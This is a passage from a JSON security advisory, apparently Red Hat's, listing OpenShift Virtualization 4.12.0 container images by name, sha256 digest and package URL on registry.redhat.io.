"container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "product": { "name": "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "product_id": "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "product_identification_helper": { "purl": "pkg:oci/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/bridge-marker\u0026tag=v4.12.0-24" } } }, { "category": "product_version", "name": "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "product": { "name": "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "product_id": "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator\u0026tag=v4.12.0-24" } } }, { "category": "product_version", "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "product": { "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "product_id": "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "product_identification_helper": { "purl": "pkg:oci/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins\u0026tag=v4.12.0-24" } } }, { "category": "product_version", "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "product": { "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "product_id": "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "product_identification_helper": { "purl": "pkg:oci/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8\u0026tag=v4.12.0-58" } } }, { "category": "product_version", "name": "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "product": { "name": "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "product_id": "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "product_identification_helper": { "purl": "pkg:oci/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry\u0026tag=v4.12.0-769" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "product": { "name": "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "product_id": "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver\u0026tag=v4.12.0-30" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "product": { "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "product_id": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8\u0026tag=v4.12.0-30" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "product": { "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "product_id": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator\u0026tag=v4.12.0-31" } } }, { "category": "product_version", "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "product": { "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "product_id": "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "product_identification_helper": { "purl": "pkg:oci/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator\u0026tag=v4.12.0-96" } } }, { "category": "product_version", "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "product": { "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "product_id": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "product_identification_helper": { "purl": "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8\u0026tag=v4.12.0-96" } } }, { "category": "product_version", "name": "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "product": { "name": "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "product_id": "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "product_identification_helper": { "purl": "pkg:oci/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubemacpool\u0026tag=v4.12.0-24" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "product": { "name": "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "product_id": "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-console-plugin\u0026tag=v4.12.0-182" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "product": { "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "product_id": "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator\u0026tag=v4.12.0-64" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm\u0026tag=v4.12.0-55" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-copy-template\u0026tag=v4.12.0-55" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-datavolume\u0026tag=v4.12.0-55" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template\u0026tag=v4.12.0-55" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize\u0026tag=v4.12.0-55" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep\u0026tag=v4.12.0-55" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template\u0026tag=v4.12.0-55" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-operator\u0026tag=v4.12.0-40" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status\u0026tag=v4.12.0-55" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "product": { "name": "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "product_id": "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator\u0026tag=v4.12.0-32" } } }, { "category": "product_version", "name": "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "product": { "name": "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "product_id": "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "product_identification_helper": { "purl": "pkg:oci/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools\u0026tag=v4.12.0-255" } } }, { "category": "product_version", "name": "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "product": { "name": "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "product_id": "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "product_identification_helper": { "purl": "pkg:oci/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker\u0026tag=v4.12.0-24" } } }, { "category": "product_version", "name": "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "product": { "name": "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "product_id": "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "product_identification_helper": { "purl": "pkg:oci/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin\u0026tag=v4.12.0-24" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "product": { "name": "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "product_id": "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-api\u0026tag=v4.12.0-255" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "product": { "name": "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "product_id": "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server\u0026tag=v4.12.0-255" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "product": { "name": "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "product_id": "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver\u0026tag=v4.12.0-72" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "product": { "name": "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "product_id": "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner\u0026tag=v4.12.0-72" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "product": { "name": "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "product_id": "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller\u0026tag=v4.12.0-72" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "product": { "name": "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "product_id": "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer\u0026tag=v4.12.0-72" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "product": { "name": "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "product_id": "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator\u0026tag=v4.12.0-72" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "product": { "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "product_id": "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy\u0026tag=v4.12.0-71" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "product": { "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "product_id": "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver\u0026tag=v4.12.0-72" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "product": { "name": "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "product_id": "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-controller\u0026tag=v4.12.0-255" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "product": { "name": "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "product_id": "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-exportproxy\u0026tag=v4.12.0-255" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "product": { "name": "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "product_id": "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "product_identification_helper": { "purl": 